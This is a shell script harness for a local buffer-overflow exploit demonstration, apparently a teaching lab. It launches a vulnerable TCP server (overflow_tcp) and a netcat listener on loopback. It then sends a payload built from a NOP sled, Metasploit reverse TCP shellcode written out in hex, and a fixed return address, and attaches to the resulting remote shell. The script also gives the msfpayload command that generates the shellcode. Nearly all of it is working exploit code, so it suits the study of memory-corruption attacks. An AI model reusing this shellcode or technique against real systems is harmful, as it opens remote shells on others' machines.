#!/bin/sh

# shellcode generated with metasploit (reverse tcp shell; use netcat as tcp server):
#   ./msfpayload linux/x86/shell_reverse_tcp PrependFork=true AppendExit=true LHOST=127.0.0.1 VERBOSE=true R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'

# 260-byte buffer: 260 - 102 (shellcode length) = 158, / 2 = 79 NOPs on each side
# payload actually sent below: 79xNOP (0x90) + 102-byte shellcode + 83xNOP (0x90) + 4-byte return addr
#   = 268 bytes; the 4 trailing NOPs beyond the 260-byte buffer pad the gap up to the saved
#   return address (presumably the saved frame pointer -- confirm against overflow_tcp's stack layout)

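# Fail fast on any unchecked error and on unset variables. Kept POSIX because
# the shebang is /bin/sh (dash has no `read -p`, which the old version used).
set -eu

# Pre-flight: every external tool this harness shells out to must be present,
# otherwise the failure shows up later as a confusing "connection refused".
for tool in screen /bin/netcat nc; do
  if ! command -v "$tool" >/dev/null 2>&1; then
    printf 'error: required tool not found: %s\n' "$tool" >&2
    exit 1
  fi
done
if [ ! -x ./overflow_tcp ]; then
  printf 'error: ./overflow_tcp is missing or not executable\n' >&2
  exit 1
fi

# The payload generator below is Python 2 (print statement, str == bytes).
# Under Python 3 it is a SyntaxError and nc would send an empty payload, so
# pick python2 when available and refuse anything that is not major version 2.
py=$(command -v python2 || command -v python || true)
if [ -z "$py" ] \
   || ! "$py" -c 'import sys; sys.exit(0 if sys.version_info[0] == 2 else 1)' 2>/dev/null; then
  printf 'error: a Python 2 interpreter (python2 or python) is required\n' >&2
  exit 1
fi

# The return address appended to the payload is a fixed stack address
# (0xffffd49d). It can only land with ASLR disabled and an executable stack,
# and only on a build of overflow_tcp whose frame layout matches the one this
# payload was tuned against. Warn rather than abort: the user may be on a
# system where this sysctl does not exist or is handled differently.
if [ -r /proc/sys/kernel/randomize_va_space ] \
   && [ "$(cat /proc/sys/kernel/randomize_va_space)" != "0" ]; then
  printf 'warning: ASLR is enabled (randomize_va_space != 0); the hardcoded return address is unlikely to hit\n' >&2
fi

# Listener for the reverse shell, bound to loopback only (LHOST in the
# shellcode is 127.0.0.1, default LPORT 4444), detached in a screen session.
echo "starting netcat reverse tcp server .."
screen -c /dev/null -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444
sleep 1

# The vulnerable target. Capture its PID so it does not stay listening after
# the demo ends, and so we can tell whether it survived startup.
echo "starting exploitable tcp server .."
./overflow_tcp &
srv_pid=$!
trap 'kill "$srv_pid" 2>/dev/null' EXIT
sleep 1
if ! kill -0 "$srv_pid" 2>/dev/null; then
  printf 'error: ./overflow_tcp exited during startup (port 3000 in use?)\n' >&2
  exit 1
fi

# Target host is deliberately not a parameter: the shellcode calls back to
# 127.0.0.1 and the listener above binds to it, so a remote target could not
# reach the listener anyway.
host="127.0.0.1"
echo "connecting to $host .."
# Python 2 `print` appends a trailing "\n" after the return address; that
# newline is part of what the server receives, so it is kept as-is.
"$py" -c 'print "\x90"*79 + \
"\xba\x91\x60\x15\x91\xdb\xd6\xd9\x74\x24\xf4\x5f\x2b\xc9" + \
"\xb1\x13\x31\x57\x15\x83\xc7\x04\x03\x57\x11\xe2\x64\x51" + \
"\xce\x66\x65\xc1\xb3\xdb\x03\xe4\xba\x3d\x63\x8e\x71\x3d" + \
"\x10\x16\x3a\x01\xdb\x29\x73\x07\x1a\x41\xfb\xf7\xdc\x93" + \
"\x6b\xfa\xdc\x82\x37\x73\x3d\x14\xa1\xd3\xec\x06\x9d\xd7" + \
"\x87\x48\x2c\x57\xc5\xe2\x80\x77\x9a\x9a\xb6\xa8\x3e\x32" + \
"\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \
"\x03\xa2\x22\x81" + \
"\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000 \
  || { printf 'error: nc reported an error delivering the payload to %s:3000\n' "$host" >&2; exit 1; }

# POSIX replacement for bash's `read -p`: prompt on stderr, then wait for a line.
printf '%s' "[PRESS RETURN TO CONTINUE]" >&2
read -r _

# Attach to the listener; when the shell session ends the EXIT trap above
# tears down the vulnerable server.
screen -R overcat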